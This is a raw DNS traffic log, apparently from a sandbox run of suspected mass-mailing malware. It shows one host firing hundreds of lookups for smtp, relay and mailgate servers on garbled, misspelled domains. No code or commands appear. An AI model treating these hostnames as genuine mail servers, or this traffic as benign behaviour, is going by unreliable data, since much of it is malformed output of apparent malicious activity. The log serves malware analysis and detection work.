Nov 30, 2023 11:22:48.413264036 CET	192.168.2.4	1.1.1.1	0x51d9	Standard query (0)	relay.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.413264990 CET	192.168.2.4	1.1.1.1	0x8bc8	Standard query (0)	smtp.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.418041945 CET	192.168.2.4	1.1.1.1	0xd136	Standard query (0)	smtp.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.426109076 CET	192.168.2.4	1.1.1.1	0x1be7	Standard query (0)	smtp.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.444746017 CET	192.168.2.4	1.1.1.1	0x5ac2	Standard query (0)	smtp.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.444746017 CET	192.168.2.4	1.1.1.1	0xbca5	Standard query (0)	relay.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.450824022 CET	192.168.2.4	1.1.1.1	0x393b	Standard query (0)	smtp.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.451212883 CET	192.168.2.4	1.1.1.1	0xb6a1	Standard query (0)	smtp.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.451284885 CET	192.168.2.4	1.1.1.1	0x5a9a	Standard query (0)	smtp.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.451286077 CET	192.168.2.4	1.1.1.1	0x3d9f	Standard query (0)	relay.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.451371908 CET	192.168.2.4	1.1.1.1	0x78cb	Standard query (0)	smtp.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.451550007 CET	192.168.2.4	1.1.1.1	0x1189	Standard query (0)	smtp.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.489195108 CET	192.168.2.4	1.1.1.1	0xddd3	Standard query (0)	smtp.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.489742994 CET	192.168.2.4	1.1.1.1	0xf0d2	Standard query (0)	smtp.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.491962910 CET	192.168.2.4	1.1.1.1	0x2d1c	Standard query (0)	smtp.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.493010044 CET	192.168.2.4	1.1.1.1	0x1f4e	Standard query (0)	smtp.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.499984980 CET	192.168.2.4	1.1.1.1	0x975b	Standard query (0)	smtp.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.501450062 CET	192.168.2.4	1.1.1.1	0x3b69	Standard query (0)	smtp.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.610486031 CET	192.168.2.4	1.1.1.1	0xabb0	Standard query (0)	smtp.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.612755060 CET	192.168.2.4	1.1.1.1	0xda47	Standard query (0)	smtp.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.614008904 CET	192.168.2.4	1.1.1.1	0x6772	Standard query (0)	smtp.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.660996914 CET	192.168.2.4	1.1.1.1	0x4790	Standard query (0)	smtp.yahio.comcm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.661497116 CET	192.168.2.4	1.1.1.1	0x8f65	Standard query (0)	smtp.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.662405968 CET	192.168.2.4	1.1.1.1	0xbe1c	Standard query (0)	smtp.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.665462971 CET	192.168.2.4	1.1.1.1	0x394b	Standard query (0)	smtp.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.705041885 CET	192.168.2.4	1.1.1.1	0xb8c0	Standard query (0)	smtp.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.705316067 CET	192.168.2.4	1.1.1.1	0xc3	Standard query (0)	smtp.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.705912113 CET	192.168.2.4	1.1.1.1	0xa6cb	Standard query (0)	smtp.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.706082106 CET	192.168.2.4	1.1.1.1	0x3e7e	Standard query (0)	smtp.sgt9o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.708156109 CET	192.168.2.4	1.1.1.1	0x1990	Standard query (0)	smtp.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.723364115 CET	192.168.2.4	1.1.1.1	0x7370	Standard query (0)	relay.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.723737001 CET	192.168.2.4	1.1.1.1	0x3008	Standard query (0)	smtp.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.739037991 CET	192.168.2.4	1.1.1.1	0x9bd8	Standard query (0)	smtp.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.753041029 CET	192.168.2.4	1.1.1.1	0xbcf9	Standard query (0)	smtp.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.753391981 CET	192.168.2.4	1.1.1.1	0xf0d2	Standard query (0)	smtp.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.758940935 CET	192.168.2.4	1.1.1.1	0xcb80	Standard query (0)	smtp.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.759241104 CET	192.168.2.4	1.1.1.1	0xfea2	Standard query (0)	smtp.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.759444952 CET	192.168.2.4	1.1.1.1	0xb520	Standard query (0)	smtp.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.766062975 CET	192.168.2.4	1.1.1.1	0x14d6	Standard query (0)	relay.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.767028093 CET	192.168.2.4	1.1.1.1	0x2d7a	Standard query (0)	smtp.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.776685953 CET	192.168.2.4	1.1.1.1	0x5cec	Standard query (0)	smtp.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.776879072 CET	192.168.2.4	1.1.1.1	0xff39	Standard query (0)	smtp.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.785527945 CET	192.168.2.4	1.1.1.1	0x3d1f	Standard query (0)	smtp.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.923952103 CET	192.168.2.4	1.1.1.1	0x394b	Standard query (0)	smtp.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.938153028 CET	192.168.2.4	1.1.1.1	0xe282	Standard query (0)	relay.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.943761110 CET	192.168.2.4	1.1.1.1	0x1d02	Standard query (0)	smtp.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.947344065 CET	192.168.2.4	1.1.1.1	0xfae1	Standard query (0)	smtp.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.947828054 CET	192.168.2.4	1.1.1.1	0x9209	Standard query (0)	smtp.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.948405981 CET	192.168.2.4	1.1.1.1	0x7ac6	Standard query (0)	smtp.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.952594995 CET	192.168.2.4	1.1.1.1	0x79d7	Standard query (0)	pop.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.992671013 CET	192.168.2.4	1.1.1.1	0x1990	Standard query (0)	smtp.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.992707014 CET	192.168.2.4	1.1.1.1	0xc3	Standard query (0)	smtp.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.992940903 CET	192.168.2.4	1.1.1.1	0x7370	Standard query (0)	relay.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.995621920 CET	192.168.2.4	1.1.1.1	0x7be2	Standard query (0)	smtp.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.000704050 CET	192.168.2.4	1.1.1.1	0xbe6f	Standard query (0)	smtp.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.057440996 CET	192.168.2.4	1.1.1.1	0x14d6	Standard query (0)	relay.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.057477951 CET	192.168.2.4	1.1.1.1	0xff39	Standard query (0)	smtp.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.058146954 CET	192.168.2.4	1.1.1.1	0x8802	Standard query (0)	mailgate.yahjl.cxs	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.064513922 CET	192.168.2.4	1.1.1.1	0xcb7c	Standard query (0)	smtp.tload.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.069740057 CET	192.168.2.4	1.1.1.1	0x5e68	Standard query (0)	mailgate.yah23051987hont.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.273556948 CET	192.168.2.4	1.1.1.1	0xfae1	Standard query (0)	smtp.e.gr	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.273607016 CET	192.168.2.4	1.1.1.1	0xe282	Standard query (0)	relay.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.273629904 CET	192.168.2.4	1.1.1.1	0x1d02	Standard query (0)	smtp.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.275105953 CET	192.168.2.4	1.1.1.1	0x67dc	Standard query (0)	relay.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.284964085 CET	192.168.2.4	1.1.1.1	0x7dd4	Standard query (0)	mailgate.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.302508116 CET	192.168.2.4	1.1.1.1	0x8c4f	Standard query (0)	relay.getococuail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.346215010 CET	192.168.2.4	1.1.1.1	0x3b63	Standard query (0)	mailgate.comcaci.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.358601093 CET	192.168.2.4	1.1.1.1	0xb4cc	Standard query (0)	smtp.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.364224911 CET	192.168.2.4	1.1.1.1	0xcd00	Standard query (0)	relay.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.369402885 CET	192.168.2.4	1.1.1.1	0x8697	Standard query (0)	mailgate.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.596363068 CET	192.168.2.4	1.1.1.1	0x9ede	Standard query (0)	mailgate.zma51baya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.609554052 CET	192.168.2.4	1.1.1.1	0xb4cc	Standard query (0)	smtp.a0i.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:49.853269100 CET	192.168.2.4	1.1.1.1	0x3f7	Standard query (0)	mailgate.gmaigcmar19l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.195251942 CET	192.168.2.4	1.1.1.1	0x299	Standard query (0)	mailgate.loaquorezcil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.202508926 CET	192.168.2.4	1.1.1.1	0xb78	Standard query (0)	relay.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.202928066 CET	192.168.2.4	1.1.1.1	0x22c5	Standard query (0)	mailgate.asgmaanxgdil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.207386017 CET	192.168.2.4	1.1.1.1	0x4f22	Standard query (0)	mailgate.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.215584040 CET	192.168.2.4	1.1.1.1	0x2e16	Standard query (0)	relay.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.215584040 CET	192.168.2.4	1.1.1.1	0x5da7	Standard query (0)	mailgate.phcg87k6barre352odseba.dcivenail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.329881907 CET	192.168.2.4	1.1.1.1	0xcdab	Standard query (0)	pop3.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.332490921 CET	192.168.2.4	1.1.1.1	0x90f6	Standard query (0)	mailgate.as.hauet	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.431258917 CET	192.168.2.4	1.1.1.1	0x4e68	Standard query (0)	mailgate.comcaio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.599941015 CET	192.168.2.4	1.1.1.1	0x500e	Standard query (0)	mailgate.daytonpubhocso.cog	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.612051964 CET	192.168.2.4	1.1.1.1	0xe9d9	Standard query (0)	mailgate.cucumbnr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.750550985 CET	192.168.2.4	1.1.1.1	0x8d46	Standard query (0)	mailgate.kni.ol168.ecom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.831223965 CET	192.168.2.4	1.1.1.1	0x9498	Standard query (0)	mailgate.osrniamadvea.lrhzda.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.895932913 CET	192.168.2.4	1.1.1.1	0x8058	Standard query (0)	mailgate.hot13l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.907876968 CET	192.168.2.4	1.1.1.1	0x6881	Standard query (0)	mailgate.caatholiomissa.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.914128065 CET	192.168.2.4	1.1.1.1	0x7dc1	Standard query (0)	mailgate.domo5ho.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.970902920 CET	192.168.2.4	1.1.1.1	0x8781	Standard query (0)	mailgate.wn26lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:50.971700907 CET	192.168.2.4	1.1.1.1	0xf591	Standard query (0)	mailgate.jubo.cath	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.016119957 CET	192.168.2.4	1.1.1.1	0x363	Standard query (0)	mailgate.hotmea1aia.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.021945000 CET	192.168.2.4	1.1.1.1	0x2c38	Standard query (0)	mailgate.yahpn.yb	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.025270939 CET	192.168.2.4	1.1.1.1	0x4df9	Standard query (0)	aqh.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:51.058119059 CET	192.168.2.4	1.1.1.1	0xba8	Standard query (0)	mailgate.wr.omt222lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.127535105 CET	192.168.2.4	1.1.1.1	0x71a2	Standard query (0)	mailgate.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.128386021 CET	192.168.2.4	1.1.1.1	0xdb6a	Standard query (0)	mailgate.yahnt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.128776073 CET	192.168.2.4	1.1.1.1	0x9ede	Standard query (0)	mailgate.n.n.amdiu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.129478931 CET	192.168.2.4	1.1.1.1	0xd6e2	Standard query (0)	mailgate.h2.spainvil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.129714012 CET	192.168.2.4	1.1.1.1	0x2ea0	Standard query (0)	mailgate.oa.lagdfillemlmlml00xydurail.jkeziac.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.129911900 CET	192.168.2.4	1.1.1.1	0x996b	Standard query (0)	mailgate.acesineuiw.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.135782957 CET	192.168.2.4	1.1.1.1	0x9e60	Standard query (0)	mailgate.asail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.142011881 CET	192.168.2.4	1.1.1.1	0xdf68	Standard query (0)	mailgate.yahgt.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.142364979 CET	192.168.2.4	1.1.1.1	0x2e24	Standard query (0)	mailgate.23xd5a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.142590046 CET	192.168.2.4	1.1.1.1	0x86c8	Standard query (0)	mailgate.il.om	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.178610086 CET	192.168.2.4	1.1.1.1	0xa2c	Standard query (0)	aqh.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.197738886 CET	192.168.2.4	1.1.1.1	0x7915	Standard query (0)	mailgate.t-yil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.201111078 CET	192.168.2.4	1.1.1.1	0x4cf1	Standard query (0)	mailgate.ayls.xcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.203926086 CET	192.168.2.4	1.1.1.1	0xf596	Standard query (0)	mailgate.t.ahlfth	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.204478025 CET	192.168.2.4	1.1.1.1	0x36c2	Standard query (0)	mailgate.gmdcblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.306339979 CET	192.168.2.4	1.1.1.1	0x9040	Standard query (0)	mailgate.lyco2.comom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.306505919 CET	192.168.2.4	1.1.1.1	0x4df9	Standard query (0)	aqh.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:51.307781935 CET	192.168.2.4	1.1.1.1	0x1b60	Standard query (0)	mailgate.geu015naryo-uail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.310106039 CET	192.168.2.4	1.1.1.1	0x66bf	Standard query (0)	mailgate.qebyte.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.311570883 CET	192.168.2.4	1.1.1.1	0x53e4	Standard query (0)	mailgate.feoio.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.312189102 CET	192.168.2.4	1.1.1.1	0x8f28	Standard query (0)	mailgate.hl.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.316219091 CET	192.168.2.4	1.1.1.1	0x54c0	Standard query (0)	mailgate.nnblmogblmoglil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.325690985 CET	192.168.2.4	1.1.1.1	0x5559	Standard query (0)	mailgate.gez542l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.326641083 CET	192.168.2.4	1.1.1.1	0x7092	Standard query (0)	mailgate.klp.tn	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.327780962 CET	192.168.2.4	1.1.1.1	0x7f67	Standard query (0)	mailgate.fldie12.jdgwcollfaaba.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.331613064 CET	192.168.2.4	1.1.1.1	0x90a0	Standard query (0)	mailgate.s.ddo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.332954884 CET	192.168.2.4	1.1.1.1	0xb151	Standard query (0)	mailgate.yahwoooie2ampu.comsh	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.372502089 CET	192.168.2.4	1.1.1.1	0x71a2	Standard query (0)	mailgate.ho10a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.375982046 CET	192.168.2.4	1.1.1.1	0x75ef	Standard query (0)	mailgate.horadguc1995l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.376277924 CET	192.168.2.4	1.1.1.1	0x7db9	Standard query (0)	mailgate.gbivlporollm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.377393007 CET	192.168.2.4	1.1.1.1	0xa1f5	Standard query (0)	mailgate.f.nyhm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.381716013 CET	192.168.2.4	1.1.1.1	0xf092	Standard query (0)	mailgate.pyctl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.382432938 CET	192.168.2.4	1.1.1.1	0xee4	Standard query (0)	mailgate.sbcgloboo.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.492527008 CET	192.168.2.4	1.1.1.1	0x2575	Standard query (0)	mailgate.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.612190008 CET	192.168.2.4	1.1.1.1	0x59e0	Standard query (0)	mailgate.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.613110065 CET	192.168.2.4	1.1.1.1	0xb5a3	Standard query (0)	mailgate.slyvor.as290a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.628863096 CET	192.168.2.4	1.1.1.1	0x927e	Standard query (0)	mailgate.yahao.lsa	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.628863096 CET	192.168.2.4	1.1.1.1	0xb65b	Standard query (0)	mailgate.rhacmtu.au	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.630199909 CET	192.168.2.4	1.1.1.1	0x13c9	Standard query (0)	ftp.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.630199909 CET	192.168.2.4	1.1.1.1	0xcba5	Standard query (0)	mailgate.comcamm.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.669285059 CET	192.168.2.4	1.1.1.1	0xb4b6	Standard query (0)	mailgate.ee.idbo	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.733294964 CET	192.168.2.4	1.1.1.1	0x2575	Standard query (0)	mailgate.qhlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.974606991 CET	192.168.2.4	1.1.1.1	0x59e0	Standard query (0)	mailgate.yahe.nen	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.974606991 CET	192.168.2.4	1.1.1.1	0x1ef1	Standard query (0)	mailgate.rknsieiwn.ail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.975397110 CET	192.168.2.4	1.1.1.1	0x3f4c	Standard query (0)	mailgate.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.994703054 CET	192.168.2.4	1.1.1.1	0x6b6	Standard query (0)	mailgate.m0bhfhblezlsl1.co.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.994704008 CET	192.168.2.4	1.1.1.1	0x1c7f	Standard query (0)	mailgate.syn.lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:51.996088028 CET	192.168.2.4	1.1.1.1	0xe24f	Standard query (0)	mailgate.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.003050089 CET	192.168.2.4	1.1.1.1	0x9435	Standard query (0)	mailgate.h333ol03t8rwslive21lok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.045458078 CET	192.168.2.4	1.1.1.1	0x47eb	Standard query (0)	mailgate.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.045838118 CET	192.168.2.4	1.1.1.1	0xd661	Standard query (0)	mailgate.7.dceilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.045838118 CET	192.168.2.4	1.1.1.1	0x2d9b	Standard query (0)	mailgate.buromaril.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.047733068 CET	192.168.2.4	1.1.1.1	0x142a	Standard query (0)	mailgate.deptka7ffmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.051595926 CET	192.168.2.4	1.1.1.1	0xdc39	Standard query (0)	park-mx.above.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.482773066 CET	192.168.2.4	1.1.1.1	0x3f4c	Standard query (0)	mailgate.acooil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.482821941 CET	192.168.2.4	1.1.1.1	0x47eb	Standard query (0)	mailgate.1rz.ramal.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.482821941 CET	192.168.2.4	1.1.1.1	0xe24f	Standard query (0)	mailgate.gmai76afmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.484627008 CET	192.168.2.4	1.1.1.1	0xf1fa	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.488569021 CET	192.168.2.4	1.1.1.1	0xa5ed	Standard query (0)	mailgate.ser711a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.489042044 CET	192.168.2.4	1.1.1.1	0x1a20	Standard query (0)	mailgate.gtblil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.490778923 CET	192.168.2.4	1.1.1.1	0x9e0b	Standard query (0)	mailgate.e-fja8mso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.490825891 CET	192.168.2.4	1.1.1.1	0x3ce3	Standard query (0)	mailgate.mn.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.492871046 CET	192.168.2.4	1.1.1.1	0x5b84	Standard query (0)	mailgate.yahfll.ianus	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.498898029 CET	192.168.2.4	1.1.1.1	0xe7ee	Standard query (0)	mailgate.sbcglob4m.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.501425982 CET	192.168.2.4	1.1.1.1	0xe088	Standard query (0)	relay.yahgr.neaco	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.501768112 CET	192.168.2.4	1.1.1.1	0xb93e	Standard query (0)	mailgate.ezi.adompany.at	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.504681110 CET	192.168.2.4	1.1.1.1	0x4f55	Standard query (0)	mailgate.tbsayail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.945631027 CET	192.168.2.4	1.1.1.1	0xf1fa	Standard query (0)	mailgate.mess.ck	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:52.946681976 CET	192.168.2.4	1.1.1.1	0xc041	Standard query (0)	mailgate.ez786-lcolwicn.coofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.119678974 CET	192.168.2.4	1.1.1.1	0x937f	Standard query (0)	mailgate.he0114zusmg454lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.121861935 CET	192.168.2.4	1.1.1.1	0x46cd	Standard query (0)	mailgate.h4y.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.122944117 CET	192.168.2.4	1.1.1.1	0x5abb	Standard query (0)	mailgate.ytcjmiil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.124098063 CET	192.168.2.4	1.1.1.1	0xf8ad	Standard query (0)	rhic-boutique.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:53.295176029 CET	192.168.2.4	1.1.1.1	0xe47a	Standard query (0)	mailgate.rambojoocta.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.299554110 CET	192.168.2.4	1.1.1.1	0x5e84	Standard query (0)	mailgate.a.o.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.303734064 CET	192.168.2.4	1.1.1.1	0x767	Standard query (0)	mailgate.hgaarnlundejl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.311722994 CET	192.168.2.4	1.1.1.1	0x8176	Standard query (0)	smtp.gmaiuilil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.314897060 CET	192.168.2.4	1.1.1.1	0xea41	Standard query (0)	mailgate.as.r.upze	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.323820114 CET	192.168.2.4	1.1.1.1	0x89ab	Standard query (0)	ww38.aqh.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.422198057 CET	192.168.2.4	1.1.1.1	0x5179	Standard query (0)	mailgate.aomttdl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.422460079 CET	192.168.2.4	1.1.1.1	0x5ba1	Standard query (0)	mailgate.ochcar.cin4g9tdamn.bagcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:53.423341990 CET	192.168.2.4	1.1.1.1	0x15db	Standard query (0)	relay.yahcl.com	A (IP address)	IN (0x0001)	false
